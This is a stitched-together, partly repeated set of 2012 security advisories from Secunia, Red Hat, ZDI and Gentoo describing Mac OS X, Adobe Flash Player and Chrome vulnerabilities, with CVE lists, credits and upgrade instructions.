http://secunia.com/advisories/47843/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=47843 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. 1) The Address Book component downgrades to an unencrypted connection when an encrypted connection fails. This can be exploited to intercept CardDAV data. 2) An error in the bundled version of Apache can be exploited to cause a temporary DoS (Denial of Service). For more information: SA46013 3) A design error in Apache within the Secure Sockets Layer 3.0 (SSL) and Transport Layer Security 1.0 (TLS) protocols when using a block cipher in CBC mode can be exploited to decrypt data protected by SSL. 4) An error in ATS when handling data-font files can be exploited to corrupt memory via a specially crafted font opened by Font Book. 5) An error in CFNetwork when handling URLs can be exploited to disclose sensitive information via a specially crafted web page as a request could be sent to an incorrect origin server. 6) An error in CFNetwork when handling URLs can be exploited to disclose sensitive information via a specially crafted web page as unexpected request headers could be sent. 7) An integer overflow error in ColorSync when handling images with embedded ColorSync profiles can be exploited to cause a heap-based buffer overflow via a specially crafted image. 8) An error in CoreAudio when handling AAC encoded audio streams can be exploited to cause a buffer overflow when playing specially crafted audio content. 9) An error in CoreMedia when handling H.264 encoded movies can be exploited to cause a heap-based buffer overflow. 10) A use-after-free error in CoreText when handling documents containing fonts can be exploited to dereference already freed memory via a specially crafted font. 11) An error exists in CoreUI when handling long URLs and can be exploited via a specially crafted website. 12) An error in curl can be exploited by remote servers to impersonate clients via GSSAPI requests. For more information: SA45067 13) Two of the certificate authorities in the list of trusted root certificates have issued intermediate certificates to DigiCert Malaysia, who has issued certificates with weak keys that cannot be revoked. 14) A design error in dovecot within the Secure Sockets Layer 3.0 (SSL) and Transport Layer Security 1.0 (TLS) protocols when using a block cipher in CBC mode can be exploited to decrypt data protected by SSL. 15) An error in the uncompress command line tool when decompressing compressed files can be exploited to cause a buffer overflow. For more information: SA45544 16) An error in ImageIO when parsing TIFF images can be exploited to cause a buffer overflow. For more information see vulnerability #9: SA45325 17) An error in ImageIO when handling ThunderScan encoded TIFF images can be exploited to cause a buffer overflow. For more information see vulnerability #2: SA43593: 18) An error exists in the bundled version of libpng. For more information: SA46148 19) An error in Internet Sharing may cause the used Wi-Fi configuration to revert to factory defaults (e.g. disabling the WEP password) after a system update. 20) An error in Libinfo can be exploited to disclose sensitive information via a specially crafted website. For more information see vulnerability #4: SA46747 21) An integer overflow error in libresolv when parsing DNS resource records can be exploited to cause a heap-based buffer overflow. 22) An error in libsecurity may cause some EV certificates to be trusted even when the corresponding root is marked untrusted. 23) Multiple errors in OpenGL when handling GLSL compilation can be exploited to corrupt memory. 24) Multiple errors exist in the bundled version of PHP. For more information: SA44874 SA45678 25) Various errors in FreeType when handling Type 1 fonts can be exploited to corrupt memory. For more information: SA46575 26) An error in QuickTime when parsing MP4 encoded files can be exploited to access uninitialised memory. 27) A signedness error in QuickTime when handling font tables embedded in movie files can be exploited to corrupt memory. 28) An off-by-one error in QuickTime when handling rdrf atoms in movie files can be exploited to cause a single byte buffer overflow. 29) An error in QuickTime when parsing JPEG2000 images can be exploited to cause a buffer overflow. 30) An error in QuickTime when parsing PNG images can be exploited to cause a buffer overflow. 31) An error in QuickTime when handling FLC encoded movie files can be exploited to cause a buffer overflow. 32) Multiple errors exists in the bundled version of SquirrelMail. For more information: SA40307 SA45197 33) Various errors exist in the bundled version of Subversion. For more information: SA44681 34) Time Machine does not verify that a designated remote AFP volume or Time Capsule is used for subsequent backups. This can be exploited to access backups by spoofing the remote volume. 35) Errors exist in the bundled version of Tomcat. For more information: SA44981 36) An error in WebDAV Sharing when handling user authentication can be exploited by local users to gain escalated privileges. 37) An error exists in the bundled version of Webmail. For more information: SA45605 SOLUTION: Update to OS X Lion version 10.7.3 or apply Security Update 2012-001. PROVIDED AND/OR DISCOVERED BY: 4, 10) Will Dormann, CERT/CC The vendor also credits: 1) Bernard Desruisseaux, Oracle Corporation 5, 6) Erling Ellingsen, Facebook 7) binaryproof via ZDI 8, 27, 28, 29, 30) Luigi Auriemma via ZDI 9) Scott Stender, iSEC Partners 11) Ben Syverson 19) An anonymous person 21) Ilja van Sprundel, IOActive 22) Alastair Houghton 23) Chris Evans, Google Chrome Security Team and Marc Schoenefeld, Red Hat Security Response Team 26) Luigi Auriemma via ZDI and pa_kt via ZDI 31) Matt "j00ru" Jurczyk via ZDI 34) Michael Roitzsch, Technische Universit\xe4t Dresden 36) Gordon Davisson, Crywolf ORIGINAL ADVISORY: Apple Security Update 2012-001: http://support.apple.com/kb/HT5130 US-CERT: http://www.kb.cert.org/vuls/id/403593 http://www.kb.cert.org/vuls/id/410281 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of MP4 files. A size value is read from MP4 files and used for size calculation without proper validation. The arithmetic performed on the size value can cause integer overflows, resulting in undersized allocations. This undersized memory allocation can be subsequently overpopulated with data supplied by the input file which can be used to gain remote code execution under the context of the current process. If this function is called with id '2200' it will write a 0x01 byte to a user supplied address. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2012:0144-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html Issue date: 2012-02-17 CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 CVE-2012-0767 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed on the Adobe security page APSB12-03, listed in the References section. Multiple security flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially-crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the specially-crafted SWF content. (CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially-crafted web page. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03) 791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-0752.html https://www.redhat.com/security/data/cve/CVE-2012-0753.html https://www.redhat.com/security/data/cve/CVE-2012-0754.html https://www.redhat.com/security/data/cve/CVE-2012-0755.html https://www.redhat.com/security/data/cve/CVE-2012-0756.html https://www.redhat.com/security/data/cve/CVE-2012-0767.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb12-03.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq 2hfvaUbJyuTg8og5n/gSdGc= =7NQZ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-080 : Adobe Flash Player MP4 Stream Decoding Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-080 June 6, 2012 - -- CVE ID: CVE-2012-0754 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Adobe - -- Affected Products: Adobe Flash Player - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12273. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb12-03.html - -- Disclosure Timeline: 2012-01-12 - Vulnerability reported to vendor 2012-06-06 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass intended access restrictions, bypass cross-domain policy, inject arbitrary web script, or obtain sensitive information. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228" References ========== [ 1 ] CVE-2011-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445 [ 2 ] CVE-2011-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450 [ 3 ] CVE-2011-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451 [ 4 ] CVE-2011-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452 [ 5 ] CVE-2011-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453 [ 6 ] CVE-2011-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454 [ 7 ] CVE-2011-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455 [ 8 ] CVE-2011-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456 [ 9 ] CVE-2011-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457 [ 10 ] CVE-2011-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458 [ 11 ] CVE-2011-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459 [ 12 ] CVE-2011-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460 [ 13 ] CVE-2012-0752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752 [ 14 ] CVE-2012-0753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753 [ 15 ] CVE-2012-0754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754 [ 16 ] CVE-2012-0755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755 [ 17 ] CVE-2012-0756 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756 [ 18 ] CVE-2012-0767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767 [ 19 ] CVE-2012-0768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768 [ 20 ] CVE-2012-0769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769 [ 21 ] CVE-2012-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201204-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm ---------------------------------------------------------------------- TITLE: Adobe Flash Player Multiple Vulnerabilities SECUNIA ADVISORY ID: SA48033 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48033/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48033 RELEASE DATE: 2012-02-16 DISCUSS ADVISORY: http://secunia.com/advisories/48033/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48033/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48033 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Flash Player, which can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, and compromise a user's system. 1) An unspecified error in an ActiveX Control can be exploited to corrupt memory. 2) A type confusion error can be exploited to corrupt memory. 3) An unspecified error related to MP4 parsing can be exploited to corrupt memory. 4) An unspecified error can be exploited to corrupt memory. 5) An unspecified error can be exploited to bypass certain security restrictions. 6) An unspecified error can be exploited to bypass certain security restrictions. Successful exploitation of the vulnerabilities #1 through #6 may allow execution of arbitrary code. 7) Certain unspecified input is not properly sanitised before being returned to the user. NOTE: This vulnerability is reportedly being actively exploited in targeted attacks. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: 6) Reported by the vendor 7) Reported as a 0-day. The vendor additionally credits Google The vendor also credits: 1) Xu Liu, Fortinet's FortiGuard Labs 2) Bo Qu, Palo Alto Networks 3, 4) Alexander Gavrun via ZDI 5) Eduardo Vela Nava, Google Security Team ORIGINAL ADVISORY: http://www.adobe.com/support/security/bulletins/apsb12-03.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to bypass intended access restrictions via unspecified vectors, a different vulnerability than CVE-2012-0755. Adobe Flash Player Contains a vulnerability that prevents access restrictions. This vulnerability CVE-2012-0755 Is a different vulnerability.An attacker may be able to bypass access restrictions. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2012:0144-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html Issue date: 2012-02-17 CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 CVE-2012-0767 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. These vulnerabilities are detailed on the Adobe security page APSB12-03, listed in the References section. Multiple security flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially-crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the specially-crafted SWF content. (CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially-crafted web page. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03) 791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-0752.html https://www.redhat.com/security/data/cve/CVE-2012-0753.html https://www.redhat.com/security/data/cve/CVE-2012-0754.html https://www.redhat.com/security/data/cve/CVE-2012-0755.html https://www.redhat.com/security/data/cve/CVE-2012-0756.html https://www.redhat.com/security/data/cve/CVE-2012-0767.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb12-03.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq 2hfvaUbJyuTg8og5n/gSdGc= =7NQZ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA48265 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48265/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 RELEASE DATE: 2012-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/48265/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48265/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Google Chrome, where one has an unknown impact and others can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, and compromise a user's system. 1) A use-after-free error exists within v8 element wrapper handling. 2) A use-after-free error exists within SVG value handling. 3) A buffer overflow exists within the Skia drawing library. 4) A use-after-free error exists within SVG document handling. 5) A use-after-free error exists within SVG use handling. 6) A casting error exists within line box handling. 7) A casting error exists within anonymous block splitting. 8) A use-after-free error exists within multi-column handling. 9) A use-after-free error exists within quote handling. 10) An out-of-bounds read error exists within text handling. 11) A use-after-free error exists within class attribute handling. 12) A use-after-free error exists within table section handling. 13) A use-after-free error exists within flexbox with floats handling. 14) A use-after-free error exists within SVG animation elements handling. For more information: SA48033 SOLUTION: Update to version 17.0.963.65. PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Chamal de Silva 2, 4, 5, 14) Arthur Gerkis 3) Aki Helin, OUSPG 6, 7, 8, 9, 10, 11, 12, 13) miaubiz ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228" References ========== [ 1 ] CVE-2011-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445 [ 2 ] CVE-2011-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450 [ 3 ] CVE-2011-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451 [ 4 ] CVE-2011-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452 [ 5 ] CVE-2011-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453 [ 6 ] CVE-2011-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454 [ 7 ] CVE-2011-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455 [ 8 ] CVE-2011-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456 [ 9 ] CVE-2011-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457 [ 10 ] CVE-2011-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458 [ 11 ] CVE-2011-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459 [ 12 ] CVE-2011-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460 [ 13 ] CVE-2012-0752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752 [ 14 ] CVE-2012-0753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753 [ 15 ] CVE-2012-0754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754 [ 16 ] CVE-2012-0755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755 [ 17 ] CVE-2012-0756 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756 [ 18 ] CVE-2012-0767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767 [ 19 ] CVE-2012-0768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768 [ 20 ] CVE-2012-0769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769 [ 21 ] CVE-2012-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201204-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security 